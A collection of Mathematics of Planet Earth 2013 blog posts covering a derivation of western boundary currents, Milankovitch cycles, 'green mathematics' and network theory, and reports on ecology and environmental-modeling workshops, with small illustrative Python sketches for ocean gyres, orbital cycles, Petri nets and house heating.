    $h$ is the thickness of the upper layer, $(u,v)$ are the horizontal velocity components and $g^{\prime}=g\Delta \rho / \rho_0$\ is the reduced gravity. The basin dimensions $a$ and $b$ are typically thousands of kilometers. We assume linear drag with constant drag coefficient $A$, and wind stress with amplitude $\tau_0$ in the $x-$direction only. The model defined by (4)-(6) is intended to be a schematic picture of a mid-latitude ocean basin in the northern hemisphere. The stress pattern of winds from the east in the southern half of the domain and from the west in the northern half is intended as a schematic model of the trade winds south of a relatively calm region at about $30^o N$, the horse latitudes, and westerly winds to the north.

    From the continuity equation (6), we can define a transport streamfunction:

    \begin{eqnarray}
    (7)\qquad& \psi_x &= hv; \quad \psi_y = -hu
    \end{eqnarray}

The boundaries of our idealized ocean are assumed impermeable, so we choose $\psi = 0$ on the boundaries. Taking the curl of the momentum equations (4)-(5) leads to

    \begin{eqnarray}
    (8)\qquad& A\nabla^2 \psi + \beta \psi_x &= \frac{-\tau_0 \pi}{b\rho_0} \sin(\pi y/b)
    \end{eqnarray}

    Look for a separable solution of the form

    \begin{eqnarray}
    (9)\qquad& \psi &= F(x) \sin(\pi y/b)\\
(10)\qquad& F^{\prime \prime} + \frac{\beta}{A} F^{\prime} - \frac{\pi^2}{b^2}F &= -\frac{\tau_0 \pi}{Ab\rho_0}
    \end{eqnarray}

    So $F=\tau_0 b/(\pi \rho_0 A) +G$, and $G$ obeys the homogeneous equation

    \begin{eqnarray}
(11)\qquad& G^{\prime \prime} + \frac{\beta}{A}G^{\prime} - \frac{\pi^2}{b^2} G &= 0
    \end{eqnarray}

so $G = G_+ \exp(\lambda_+ x) + G_- \exp(\lambda_- x)$ for constants $G_+$ and $G_-$, where $\lambda_\pm = -(\beta /2A)\left(1 \pm \left(1+4\pi^2 A^2 /(\beta^2 b^2)\right)^{1/2}\right)$. This could be solved as a boundary value problem, but it is more enlightening to rescale the problem.

    Scale (8) by $x\rightarrow x/L_x; y\rightarrow y/b$, so (8) becomes

    \begin{eqnarray}
    (12)\qquad& \frac{A}{\beta L_x}(\psi_{xx} + \frac{L_x^2}{b^2}\psi_{yy}) + \psi_x &= \left ( \frac{L_x}{b}\right ) \left ( \frac{-\tau_0 \pi}{\beta b \rho_0}\right ) \sin(\pi y)
    \end{eqnarray}

For basin-scale motions we may choose $L_x = b$. Dissipation in the ocean is very weak, so $A/(\beta b) \ll 1$ and the entire first term can be neglected, leaving

    \begin{eqnarray}
    (13)\qquad& \beta{hv} &= \frac{-\tau_0 \pi}{b\rho_0} \sin(\pi y/b)
    \end{eqnarray}

    where dimensions have been restored. This is a special case of the Sverdrup relation, $hv = \nabla \times (\tau^{(x)},\tau^{(y)})/(\beta \rho_0)$, i.e., transport in the north-south direction is proportional to the curl of the wind stress. This is a good approximation in the interior, but (13) is a first-order equation and cannot satisfy the boundary conditions at both the eastern and western boundaries, so the Sverdrup balance cannot hold uniformly. (Also, in this example, the transport in the interior of the basin is southward, so there must be a northward return flow somewhere.) Near at least one of the boundaries the momentum balance must be different.

    Choose $\psi=0$ at $x=a$, so the interior solution is

    \begin{eqnarray}
    (14)\qquad& \psi &= \frac{\tau_0 \pi a}{\beta b \rho_0} \sin(\pi y /b)(1 -x/a)
    \end{eqnarray}

    We must now find an approximate solution to (8) in a thin strip near $x=0$ with $\psi (0,y) = 0$ and $\psi(x,y) \rightarrow ((\tau_0 \pi a)/(\beta b \rho_0)) \sin(\pi y /b)$ as $x\rightarrow \infty$. If we choose $L_x = A/\beta$, (12) becomes

    \begin{eqnarray}
    (15)\qquad& (\psi_{xx} + \frac{A^2}{\beta^2 b^2}\psi_{yy}) + \psi_x &= \left ( \frac{A}{\beta b}\right ) \left ( \frac{-\tau_0 \pi}{\beta b \rho_0}\right ) \sin(\pi y)
    \end{eqnarray}

    Since $A/(\beta b) \ll 1$, to leading order near the boundary $\psi_{xx}+\psi_x = 0$, so $\psi = C_0 + C_1 \exp(-x)$ for constants $C_0$ and $C_1$. Restoring dimensions and matching to the interior solution, near the boundary we find

    \begin{eqnarray}
    (16)\qquad& \psi &= \frac{\tau_0 \pi a}{\beta b \rho_0} \sin(\pi y/b)(1-e^{-x\beta /A}),
    \end{eqnarray}

    very close to Stommel’s solution. This boundary layer at $x=0$ is the analog, within our simple model, of the Gulf Stream.
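
    To see the gyre, one can plot a simple composite of the interior solution (14) and the boundary-layer factor in (16). This is only a sketch: the multiplicative patching is a common shortcut rather than something derived in the text, and the parameter values are the same made-up numbers as above.

    import numpy as np
    import matplotlib.pyplot as plt

    # Same illustrative parameter values as in the sketch above (made up, SI units).
    tau0, rho0, A, beta = 0.1, 1000.0, 1.0e-6, 2.0e-11
    a = b = 5.0e6

    x = np.linspace(0.0, a, 400)
    y = np.linspace(0.0, b, 200)
    X, Y = np.meshgrid(x, y)

    # Interior Sverdrup solution (14) multiplied by the boundary-layer factor from (16).
    psi = ((tau0 * np.pi * a / (beta * b * rho0)) * np.sin(np.pi * Y / b)
           * (1.0 - X / a) * (1.0 - np.exp(-X * beta / A)))

    plt.contour(X / 1e3, Y / 1e3, psi, 15)
    plt.xlabel("x (km)")
    plt.ylabel("y (km)")
    plt.title("Broad interior flow, narrow western boundary current")
    plt.show()

    The contours crowd into a strip of width about $A/\beta$ along $x=0$; that strip is the model’s Gulf Stream.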

    What would happen if we were to choose the interior solution as

    \begin{eqnarray}
    (17)\qquad& \psi &= \frac{\tau_0 \pi a}{\beta b \rho_0} \sin(\pi y /b)(-x/a)
    \end{eqnarray}

    and attempt to fit a boundary condition at $x=a$? It wouldn’t work. We would need to find $C_0$ and $C_1$ such that, in a neighborhood of the boundary, $\psi = C_0 + C_1 \exp(-x\beta /A)$ with $\psi (x=a,y) = 0$ and $\psi (x,y) \rightarrow -((\tau_0 \pi a)/(\beta b \rho_0)) \sin(\pi y /b)$ as $x\rightarrow -\infty$, which is clearly impossible.

    So western boundary currents occur on the western sides of ocean basins because $\beta$ is positive, and since $\beta$ is positive in both hemispheres, western boundary currents form in the southern hemisphere as well.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Geophysics, Mathematics, Ocean | Leave a comment

    “Models and Methods in Ecology, Epidemiology (M2E2)”

    A scientific workshop, as part of the pan-Canadian MPE2013 thematic
    program “Models and Methods in Ecology, Epidemiology and Public Health
    (M2E2)”, started at CRM today.

    The workshop, focusing on models and methods in ecology and epidemiology,
    was designed to initiate a conversation for the subsequent activities of
    the pan-Canadian thematic year, in the hope of breaking down some barriers
    between the practitioners of the different modeling techniques and
    approaches. The organizers (Jacques Bélair and Jianhong Wu) made an effort
    to engage participants who are geographically close but diverse in
    scientific expertise, as well as participants of other planned workshops
    of the year, to ensure that research collaborations will persist after
    this particular workshop and that most if not all of the modeling
    techniques to be addressed during the year will be at least partially
    explored at this workshop.

    In the opening session of the workshop, the organizers presented a brief
    review of a few interdisciplinary research projects funded by two NCE
    centers (MITACS and GEOIDE) on mathematical contributions to addressing
    issues of major public health concern relevant to Lyme disease, avian
    influenza and West Nile virus. Some success has been achieved in
    developing an approach integrating lab tests and experiments,
    bioinformatics, surveillance and statistical analysis, geo-simulations and
    mathematical modeling, but much work remains to develop and enhance
    large-scale interdisciplinary research capacity linking qualitative and
    fundamental sciences to public health policy decision making and practice.

    The main organizers of the pan-Canadian thematic program are Frithjof
    Lutscher (U of Ottawa), Jacques Bélair (U de Montréal), Mark Lewis (U of
    Alberta), James Watmough (U of New Brunswick), and Jianhong Wu (York U).


    Posted in Conference Report, Ecology, Epidemiology, General | Leave a comment

    A Personal “Day Zero” Experience

    I have been involved with MPE2013 activities since the first organizing workshop was held at AIM in March of 2011, not as a mathematician with MPE areas of interest, but more as an institute staff member helping to bring about workshops or lectures, or helping with the webpages.

    This has given me a bit of distance to observe the evolution of the initiative. One thing that I have noticed is that two years ago many of those involved were quick to point out that MPE2013 was not just about climate change or global warming, but about all the issues that face the planet. There was a real fear, or at least that was my perception, that saying too much about climate would be bad from a political standpoint. But it seems now that climate change is one of the topics that might help bring the real purpose of showcasing the role of mathematics in solving these problems to the forefront. And cautious mathematicians may be more willing to publicly discuss the thorny issues that we need to talk about.

    To borrow a phrase from Malcolm Gladwell, it seems to me there has been a “tipping point” in the public acceptance of the reality of global warming. It is becoming part of our everyday culture. Just in the last month, President Barack Obama mentioned climate change in his inaugural address. Certainly, while it may or may not be due to climate change, the horrific east coast storm season has caught our attention. There was a recent question about this in the “Ask Marilyn” column, and last Thursday the clue for 31 DOWN in the New York Times Crossword was “Global warming subj,” (the answer was ecol).

    My own real awakening came during Emily Shuckburgh’s talk at the Joint Mathematics Meeting in San Diego. This has already been the subject of one of these blogs, but I left that talk with a sense of urgency. We really do need to solve these major problems. This is not simply an academic exercise. When I saw Mary Lou Zeeman the day after the lecture, we reflected on this. She said this is called “day zero”: the day after which one never thinks about the Earth and climate change (and everything that goes along with them) in the same way again.

    Estelle Basor
    Deputy Director
    American Institute of Mathematics

    Posted in Climate Change, General | Leave a comment

    Paleoclimate Models

    Mathematics allows us to explain some of Earth’s past climates. Indeed, they are linked in particular to variations of the orbit of the Earth. While the movement of the Earth is not quasi-periodic (i.e., a superposition of periodic movements), mainly due to the gravitational influence of Jupiter and Saturn, some periodic oscillations of reasonably short period are well known and are called the Milankovitch cycles. These cycles change the insolation (the incident solar radiation) of the Earth, and hence its climate. The Earth’s axis has a precession movement (it rotates around an axis perpendicular to the ecliptic) with a period of 26,000 years, but the major axis of the elliptic orbit also rotates. This combined effect changes the time of the year when the seasons occur, with a cycle of 21,000 years. The obliquity (tilt) of the Earth’s axis oscillates between 22.1 and 24.5 degrees, with a period of 41,000 years. The present obliquity is 23.44 degrees, and it is decreasing. A decrease in the obliquity favors warmer winters and cooler summers and, globally, a glaciation. The eccentricity of the orbit of the Earth around the Sun varies from 0.005 to 0.058 with a mean value of 0.028, this being a superposition of cycles with periods from 100,000 years to 413,000 years. The present eccentricity is 0.017, and it is decreasing. Other cycles are superimposed on these.

    Modeling these variations in the Earth’s movements is part of celestial mechanics. While relativistic effects cannot always be neglected, the main methods come from dynamical systems. To understand the influence of the Milankovitch cycles on the climate, other tools are required, since oceans, land and atmosphere react differently to variations of the insolation.
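
    To get a feeling for how the cycles combine, here is a toy superposition of sinusoids with the periods quoted above. It is a sketch only: the amplitudes are arbitrary, and a real insolation calculation requires the full celestial-mechanics treatment just mentioned.

    import numpy as np
    import matplotlib.pyplot as plt

    # Toy "orbital index": sinusoids with the cycle periods quoted above, in thousands
    # of years. Amplitudes are arbitrary; this is not a real insolation calculation.
    t = np.linspace(-800, 0, 4000)                   # time in kyr before present
    index = (0.5 * np.sin(2 * np.pi * t / 21)        # precession of the seasons, ~21 kyr
             + 1.0 * np.sin(2 * np.pi * t / 41)      # obliquity, ~41 kyr
             + 0.7 * np.sin(2 * np.pi * t / 100))    # shortest eccentricity cycle, ~100 kyr

    plt.plot(t, index)
    plt.xlabel("time (kyr before present)")
    plt.ylabel("toy orbital index (arbitrary units)")
    plt.show()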

    Posted in Climate Modeling, Paleoclimate | 1 Comment

    Prospects for a Green Mathematics

    It is increasingly clear that we are initiating a sequence of dramatic events across our planet. They include habitat loss, an increased rate of extinction, global warming, the melting of ice caps and permafrost, an increase in extreme weather events, gradually rising sea levels, ocean acidification, the spread of oceanic “dead zones,” a depletion of natural resources, and ensuing social strife.

    These events are all connected. They come from a way of life that views the Earth as essentially infinite, human civilization as a negligible perturbation, and exponential economic growth as a permanent condition. Deep changes will occur as these idealizations bring us crashing into the brick wall of reality. If we do not muster the will to act before things get significantly worse, we will need to do so later. While we may plead that it is “too difficult” or “too late,” this doesn’t matter: a transformation is inevitable. All we can do is start where we find ourselves, and begin adapting to life on a finite-sized planet.

    Where does mathematics fit into all this? While the problems we face have deep roots, major transformations in society have always caused and been helped along by revolutions in mathematics. Starting near the end of the last ice age, the Agricultural Revolution eventually led to the birth of written numerals and geometry. Centuries later, the Industrial Revolution brought us calculus, and eventually a flowering of mathematics unlike any before. Now, as the 21st century unfolds, mathematics will become increasingly driven by our need to understand the biosphere and our role within it.

    We refer to mathematics suitable for understanding the biosphere as green mathematics. Although it is just being born, we can already see some of its outlines.

    Since the biosphere is a massive network of interconnected elements, we expect network theory will play an important role in green mathematics. Network theory is a sprawling field, just beginning to become organized, which combines ideas from graph theory, probability theory, biology, ecology, sociology and more. Computation plays an important role here, both because it has a network structure—think of networks of logic gates—and because it provides the means for simulating networks.

    One application of network theory is to tipping points, where a system abruptly passes from one regime to another. Scientists need to identify nearby tipping points in the biosphere to help policy makers to head off catastrophic changes. Mathematicians, in turn, are challenged to develop techniques for detecting incipient tipping points. Another application of network theory is the study of shocks and resilience. When can a network recover from a major blow to one of its subsystems?

    We claim that network theory is not just another name for biology, ecology, or any other existing science, because in it we can see new mathematical terrains. Here are two examples.

    First, consider a leaf. In The Formation of a Tree Leaf by Qinglan Xia, we see a possible key to Nature’s algorithm for the growth of leaf veins. The vein system, which is a transport network for nutrients and other substances, is modeled by Xia as a directed graph with nodes for cells and edges for the “pipes” that connect the cells. Each cell gives a revenue of energy, and incurs a cost for transporting substances to and from it.

    The total transport cost depends on the network structure. There are costs for each of the pipes, and costs for turning the fluid around the bends. For each pipe, the cost is proportional to the product of its length, its cross-sectional area raised to a power α, and the number of leaf cells that it feeds. The exponent α captures the savings from using a thicker pipe to transport materials together. Another parameter β expresses the turning cost.

    Development proceeds through cycles of growth and network optimization. During growth, a layer of cells gets added, containing every potential cell whose revenue would exceed its cost. During optimization, the graph is adjusted to find a local cost minimum. Remarkably, by varying α and β, simulations yield leaves resembling those of specific plants, such as maple or mulberry.


    A growing network.

    Unlike approaches that merely create pretty images resembling leaves, Xia presents an algorithmic model, simplified yet illuminating, of how leaves actually develop. It is a network-theoretic approach to a biological subject, and it is mathematics—replete with lemmas, theorems and algorithms—from start to finish.
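
    To make the cost functional concrete, here is a minimal sketch that follows the verbal description above literally. The three-pipe network and all parameter values are our own inventions, and in particular the form of the turning-cost term is only a placeholder guess, not Xia’s actual formulation.

    def pipe_cost(length, area, cells_fed, alpha):
        """Cost of one pipe, read literally from the description: length * area**alpha * cells_fed."""
        return length * area ** alpha * cells_fed

    def network_cost(pipes, alpha, beta):
        """Total cost of a toy vein network.

        `pipes` is a list of (length, area, cells_fed, bend_angle) tuples. The turning
        term is a placeholder guess at the role of beta: each bend is charged beta
        times its angle. Xia's actual functional is more refined."""
        transport = sum(pipe_cost(L, A, n, alpha) for (L, A, n, ang) in pipes)
        turning = sum(beta * ang for (L, A, n, ang) in pipes)
        return transport + turning

    # A made-up three-pipe "vein": (length, cross-sectional area, cells fed, bend angle)
    toy_pipes = [(1.0, 0.20, 5, 0.0), (0.5, 0.10, 2, 0.3), (0.5, 0.08, 2, 0.6)]
    for alpha in (0.5, 0.7, 0.9):
        print(alpha, network_cost(toy_pipes, alpha, beta=0.1))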

    A second example comes from stochastic Petri nets, which are a model for networks of reactions. In a stochastic Petri net, entities are designated by “tokens” and entity types by “places” which hold the tokens. “Reactions” remove tokens from their input places and deposit tokens at their output places. The reactions fire probabilistically, in a Markov chain where each reaction rate depends on the number of its input tokens.


    A stochastic Petri net.

    Perhaps surprisingly, many techniques from quantum field theory are transferable to stochastic Petri nets. The key is to represent stochastic states by power series. Monomials represent pure states, which have a definite number of tokens at each place. Each variable in the monomial stands for a place, and its exponent indicates the token count. In a linear combination of monomials, each coefficient represents the probability of being in the associated state.

    In quantum field theory, states are representable by power series with complex coefficients. The annihilation and creation of particles are cast as operators on power series. These same operators, when applied to the stochastic states of a Petri net, describe the annihilation and creation of tokens. Remarkably, the commutation relations between annihilation and creation operators, which are often viewed as a hallmark of quantum theory, make perfect sense in this classical probabilistic context.

    Each stochastic Petri net has a “Hamiltonian” which gives its probabilistic law of motion. It is built from the annihilation and creation operators. Using this, one can prove many theorems about reaction networks, already known to chemists, in a compact and elegant way. See the Azimuth network theory series for details.
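
    A minimal sketch of this bookkeeping, for a single place and a single made-up reaction (every token decays independently at rate $r$), might look as follows. The Hamiltonian $H = r(a - a^{\dagger}a)$ is the standard one for such a decay in this formalism, but the code and every name in it are ours.

    # A state of a one-place stochastic Petri net is a "power series": a dict
    # mapping the token number n to the probability coefficient of x**n.
    def annihilate(state):
        """Annihilation operator a: x**n -> n * x**(n-1)."""
        return {n - 1: n * p for n, p in state.items() if n > 0}

    def create(state):
        """Creation operator a_dagger: x**n -> x**(n+1)."""
        return {n + 1: p for n, p in state.items()}

    def combine(s1, s2, c=1.0):
        """Return the power series s1 + c * s2."""
        out = dict(s1)
        for n, p in s2.items():
            out[n] = out.get(n, 0.0) + c * p
        return out

    def hamiltonian(state, r):
        """H = r * (a - a_dagger a) for the toy decay reaction X -> nothing at rate r."""
        a_state = annihilate(state)
        h = combine(a_state, create(a_state), c=-1.0)
        return {n: r * p for n, p in h.items()}

    # Evolve d(psi)/dt = H(psi) by crude Euler steps, starting from exactly 3 tokens.
    psi, r, dt = {3: 1.0}, 1.0, 0.01
    for _ in range(200):
        psi = combine(psi, hamiltonian(psi, r), c=dt)
    print({n: round(p, 3) for n, p in sorted(psi.items()) if p > 1e-6})

    Summing the coefficients of the evolved state confirms that $H$ conserves total probability, as an infinitesimal stochastic operator must.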

    Conclusion: The life of a network, and the networks of life, are brimming with mathematical content.

    We are pursuing these subjects in the Azimuth Project, an open collaboration between mathematicians, scientists, engineers and programmers trying to help save the planet. On the Azimuth Wiki and Azimuth Blog we are trying to explain the main environmental and energy problems the world faces today. We are also studying plans of action, network theory, climate cycles, the programming of climate models, and more.

    If you would like to help, we need you and your special expertise. You can write articles, contribute information, pose questions, fill in details, write software, help with research, help with writing, and more. Just drop us a line, either here or on the Azimuth Blog.

    John Baez and David Tanzer

    Posted in Biosphere, Mathematics | 1 Comment

    Mathematicians at AIM tackle problems related to our environment

    Prepared by Ali Nadim (Claremont Graduate University) and Ami Radunskaya (Pomona College)

    What do green buildings, environmental toxins, sources of ozone pollution in the atmosphere, and infrastructure planning for electrical power have in common? They were all topics of intense study at a workshop on “Modeling Problems Related to our Environment,” which took place at the American Institute of Mathematics (AIM) in Palo Alto, CA, during the week of January 14th. This workshop operated in a format similar to the Math-in-Industry Study Groups in which the problems are introduced on the first day by liaisons from industry, the participants then divide into teams and spend the week working on the problems — with frequent gatherings for progress reports accompanied by high-quality refreshments! — and each team presents its “solution” to the problem on the last day.

    One of the projects at the workshop dealt with thermal management of green buildings, brought by the architectural firm EHDD of San Francisco. A frontier in design and manufacture of houses is the so-called “passive house” or its original European counterpart “passivhaus” movement where, through a combination of air-tight construction and smart insulation, residential houses as well as office and lab buildings can be designed that use minimal (nearly zero) energy for heating and cooling. Just the presence of a few warm bodies (e.g., humans) and the typical lighting and appliances in the house are enough to heat it to a comfortable temperature, even in the relatively cool northern European climate. The group at the workshop put together a mathematical model of such a house, accounting for heating by the incident sunlight and the internal sources (appliances and people), as well as for the controlled ventilation, convection to the outside air, and heat transfer through windows and to/from the ground. Perhaps not surprisingly, it turned out that for a well-insulated house, it was indeed possible to achieve a comfortable indoor temperature without needing an actual furnace or heater.
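
    The kind of lumped (“one-box”) heat balance the team describes can be sketched in a few lines. The balance $C\,dT/dt = Q_{\mathrm{int}} + Q_{\mathrm{solar}} - UA\,(T - T_{\mathrm{out}})$ is a generic textbook model, and every parameter value below is an illustrative guess, not a number from the workshop’s HoTS model.

    import numpy as np

    # Minimal lumped heat balance: C dT/dt = Q_int + Q_solar - UA*(T - T_out).
    # All parameter values are illustrative guesses, not those of the workshop model.
    C = 2.0e7          # effective heat capacity of the house (J/K)
    UA = 50.0          # heat-loss coefficient times envelope area (W/K)
    Q_int = 800.0      # occupants, appliances and lighting (W)

    def q_solar(t_hours):
        """Crude daytime solar gain through the windows (W)."""
        return max(0.0, 1500.0 * np.sin(np.pi * (t_hours % 24 - 6) / 12))

    def simulate(T0=20.0, T_out=0.0, days=5, dt=60.0):
        T, trajectory = T0, []
        for step in range(int(days * 24 * 3600 / dt)):
            t_hours = step * dt / 3600.0
            dTdt = (Q_int + q_solar(t_hours) - UA * (T - T_out)) / C
            T += dTdt * dt
            trajectory.append(T)
        return trajectory

    traj = simulate()
    print(min(traj), max(traj))   # with a small UA the house stays comfortable without a furnace

    Making $UA$ larger, i.e., a leakier envelope, quickly pulls the indoor temperature toward the outdoor one, which is exactly why air-tight construction and smart insulation are the heart of the passive-house idea.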

    HoTS (HOuse Thermal Simulator) – Example


    The team also investigated the use of phase-change materials as part of the insulation to see their effect on increasing the thermal mass of the house without impacting its actual physical mass. Upon adding some bells and whistles, the thermal simulator developed at the workshop can potentially be used by designers to better assess the thermal characteristics of a given house, given its solar exposure, wall and window materials, etc.

    Another workshop project, brought by the US Environmental Protection Agency (EPA), focused on the problem of “source apportionment” for atmospheric ozone. It turns out that the amount of ozone in the troposphere is dictated by the amounts of multiple precursor chemicals (mainly nitrogen oxides and volatile organic compounds), each originating at distributed locations in space and time, as well as by exposure to sunlight during the daytime hours. The series of chemical reactions leading to ozone formation is extremely complex and nonlinear, and is coupled to atmospheric transport by convection and turbulent diffusion. The goal of the EPA as a regulating agency is to assess how much each of the many potential sources of the precursor chemicals (emissions from cars, factories, etc.) contributes to the measured ozone levels at various locations and times. This is a very challenging inverse problem. The team at the workshop proposed various approaches to this problem using Proper Orthogonal Decomposition and sensitivity analysis methods, and it also studied ways of further simplifying the mathematical description of the complex nonlinear chemistry by trying to identify and eliminate (from the model) those intermediate species that play a smaller role in the overall kinetics of ozone production.

    Another project, also brought by the EPA, looked at improving the detection of toxic chemicals in our environment. Hormones, and estrogen in particular, interact with receptor molecules and trigger a cascade of molecular reactions in the body, called the “estrogen pathway”. In this problem the group tried to determine whether man-made chemicals affect this chain of reactions, thereby disrupting the natural balance of chemicals in our body. In order to test the action of various chemicals, in vitro tests have been developed which are far cheaper and more efficient than live animal testing. However, the reactions that take place in these tests are themselves complex, so a positive reading on one of these tests could also be due to activity that is unrelated to the estrogen cascade. For this reason, several different tests are performed on each chemical in order to determine its effect on the estrogen pathway. The EPA provided the team with data from multiple tests on 1800 chemicals. The problem was to determine from this data which chemicals activated the estrogen pathway, hence causing imbalance in the body. Previous attempts to solve this problem used statistical analyses based only on the data. In contrast, the AIM team used knowledge of the chemical reactions involved in the estrogen pathway, along with the data, to formulate a constrained optimization problem whose solution indicates each chemical’s tendency to interfere with these reactions. The team’s method was tested on a group of thirty-five reference chemicals that are well understood, yielding good results. The method can be refined so that the EPA can use it to effectively test chemicals on other hormonal pathways.

    The fourth and final project considered at the workshop came from Southern California Edison (SCE). Understanding the dynamics of electrical demand is important in planning our infrastructure in order to optimize our energy resources. One important feature to understand is how energy use depends on weather conditions. SCE brought our group historical data of the demand at different distribution stations. The problem was to understand which stations were “winter-peaking” (i.e., peak demand at low temperature), which were “summer-peaking” (peak demand at high temperature), and which locations were “temperature-independent” (i.e., no correlation). The AIM team developed several statistical tests to understand these correlations. In particular, they found that a linear regression was not sufficient to capture significant correlations; rather, piecewise linear regressions were much more effective. One interesting discovery was that winter-peaking stations were more important in terms of energy demand than SCE had previously thought. The AIM team was also able to give SCE advice on how to improve data collection and recording. These predictive models have the potential to enable energy companies to plan effectively, and to accurately evaluate the benefits of the use of solar panels and other types of renewable energy that depend on weather conditions.
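
    The flavor of such a piecewise linear fit can be sketched as follows. The data are synthetic, the two breakpoints are fixed by hand, and nothing here reproduces SCE’s actual analysis.

    import numpy as np

    # Synthetic data: demand rises when it is cold (heating) and when it is hot (cooling),
    # with a flat region in between. All numbers are made up for illustration.
    rng = np.random.default_rng(0)
    temp = rng.uniform(0, 40, 500)                        # daily temperature (deg C)
    demand = (100 + 3 * np.maximum(15 - temp, 0) + 4 * np.maximum(temp - 25, 0)
              + rng.normal(0, 2, temp.size))

    def piecewise_fit(temp, demand, lo=15.0, hi=25.0):
        """Least-squares fit of demand ~ a + b*max(lo - T, 0) + c*max(T - hi, 0).

        The breakpoints lo and hi are fixed by hand here; in practice one would also
        search over them. Returns the coefficients (a, b, c)."""
        X = np.column_stack([np.ones_like(temp),
                             np.maximum(lo - temp, 0.0),
                             np.maximum(temp - hi, 0.0)])
        coef, *_ = np.linalg.lstsq(X, demand, rcond=None)
        return coef

    a, b, c = piecewise_fit(temp, demand)
    print(a, b, c)   # b > 0 flags "winter-peaking", c > 0 flags "summer-peaking" behavior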

    Posted in Ecology, Workshop Report | Leave a comment

    March 5th: MPE Day at UNESCO

    An exciting day is coming up shortly. Now that MPE2013 has been launched in North America, the next launch will take place in Europe at the UNESCO Headquarters in Paris on March 5, 2013. The same day will see the launch of the MPE Open Source Exhibition, the outcome of an international competition for modules for a traveling exhibit. The jury for this competition, chaired by Ehrhard Behrends, met in early January, shortly after the deadline for submissions of December 20, 2012, at the Institute for Computational and Experimental Research in Mathematics (ICERM) in Providence, Rhode Island, to decide on the winners of the competition and the modules that will be on view at UNESCO during MPE Day and until March 8. The winners of the competition will receive their prize in Paris during MPE Day.

    The MPE Open Source Exhibition will be hosted permanently through the IMAGINARY project at Oberwolfach. Andreas Daniel Matt and his team in Oberwolfach are working hard to install the modules on the Open Source IMAGINARY platform, which has been released in the public domain. Several of the modules will be available in different languages.

    In parallel to the modules submitted for the competition, Centre-Sciences (CCSTI) of the region Centre (Orleans-France) is putting together a physical traveling exhibit of a dozen hands-on modules, which will also be on view at UNESCO on MPE Day. While this traveling exhibit can be rented, it is also Open Source, and a description of the modules will be added to the website of the MPE Open Source Exhibition. The MPE Open Source Exhibition is expected to grow in the future; several scientists have already committed to contribute new modules, and we hope that many more will follow.

    MPE Day, March 5, at UNESCO in Paris is hosted jointly by the International Mathematical Union (IMU) and UNESCO. It will be opened by Irina Bokova, Director-General of UNESCO. In addition to the launch of MPE2013 and the opening of the exhibit, the program will feature a presentation of the film EXIT sponsored by the Cartier Foundation for art. Edward Lungu (Botswana), recipient of the Su Buchin Prize at the 2011 International Congress of Industrial and Applied Mathematics (ICIAM), will deliver a lecture on “Utilizing the environment to manage HIV/AIDS.” In his presentation, Professor Lungu will discuss strategies to reduce the HIV/AIDS epidemic and poverty in sub-Saharan Africa through better treatment, better education and economic development.

    MPE Day will be concluded with a panel discussion on the topic “What Can Mathematics Do for the Planet?” Panelists will be MPE researchers, the UNESCO programme specialist in hydrology/tsunamis, and special guest Fanja Rakotondrajao (University of Madagascar).

    A public lecture, “Climate Models: Mathematical, Physical and Conceptual Models,” by Professor Hervé Le Treut, Director of the Institute Pierre Simon Laplace, will follow at 18:30 on the Jussieu campus of the University Pierre-et-Marie-Curie.

    Attendance at MPE Day is by invitation. To request an invitation, send a message to Omobolanle Sandey. The event will take place in the Fontenoy Building of UNESCO, 7 place de Fontenoy, room XI, Paris 75007.

    Posted in Conference Announcement, General, Public Event | Leave a comment

    Mathematics and Climate

    [Adapted from Chapter 1 of the forthcoming text “Mathematics and Climate” by Hans G. Kaper and Hans Engler, to be published by the Society for Industrial and Applied Mathematics (SIAM), 2013.]

    What is the role of mathematics in climate science? Climate science, like meteorology, is largely a branch of physics; as such, it certainly uses the language of mathematics. But could mathematics provide more than the language for scientific discourse?

    As mathematicians, we are used to setting up models for physical phenomena, usually in the form of equations. For example, we recognize the second-order differential equation $$L \ddot{x}(t)+ g \sin x(t) = 0$$ as a model for the motion of a physical pendulum under the influence of gravity. Every symbol in the equation has its counterpart in the physical world. The quantity $x(t)$ stands for the angle between the arm of the pendulum and its rest position (straight down) at the time $t$, the constant $L$ is the length of the pendulum arm, and $g$ is gravitational acceleration. The mass of the bob turns out to be unimportant and therefore does not appear in the equation. The model is understood by all to be an approximation, and part of the modeling effort consists in outlining the assumptions that went into its formulation. For example, it is assumed that there is no friction in the pendulum joint, there is no air resistance, the arm of the pendulum is massless, and the pendulum bob is idealized to be a single point. Understanding these assumptions and the resulting limitations of the model is an essential part of the modeling effort. Note that the modeling assumptions can all be assessed by an expert who is not a mathematician: a clockmaker can estimate the effect of friction in the joint, the difficulty of making a slender pendulum arm, and the effort in making a bob that offers little air resistance. As mathematicians, we take the differential equation and apply the tools of the trade to extract information about the behavior of the physical pendulum. For example, we can find its period — which is important in the design of pendulum clocks — in terms of measurable quantities.
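
    For small oscillations, for instance, linearizing $\sin x \approx x$ turns the model into a harmonic oscillator, and the period follows at once:
    $$\ddot{x}(t) + \frac{g}{L}\,x(t) \approx 0 \qquad\Longrightarrow\qquad T = 2\pi\sqrt{\frac{L}{g}},$$
    so a pendulum with $L \approx 0.994$ m has a period of about two seconds, the classical “seconds pendulum.”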

    Would it be possible to develop a “mathematical model” of the Earth’s climate system in a similar fashion? Such a model should stay close to physical reality, climate scientists should be able to assess the assumptions, and mathematicians and computational scientists should be able to extract information from it.


    Figures: the Earth’s climate system in full detail (“This?”) and the incoming and outgoing radiation of a simple energy balance model (“Or this?”).

    The figure on the left gives a climate scientist’s view of the Earth’s climate system: a system with many components that interact with one another either directly or indirectly, and with many built-in feedback loops, both positive and negative. To develop a mathematical model of such a complex system, we would need to select variables that describe the state of the system (air temperature, humidity, fractions of aerosols and trace gases in the atmosphere, strength of ocean currents, rate of evaporation from vegetation cover, change in land use due to natural cycles and human activity, and many many more), take the rules that govern their evolution (laws of motion for gases and fluids, chemical reaction laws, land use and vegetation patterns, and many many more), and translate all this into the language of mathematics. It is not at all clear that this can be done equally well for all components of the system. The laws for airflow over a mountain range may be well known, but it is much harder to predict crop use and changes in vegetation. The ranges and limitations of any such model would remain subject to debate, much more so than in the case of the pendulum equation, and the resulting equations would likely cover several pages and would be far too unwieldy for a mathematical analysis. This would leave a computational approach as the only viable option. But even here we would face limitations, given the available computational resources and the scarcity of data.

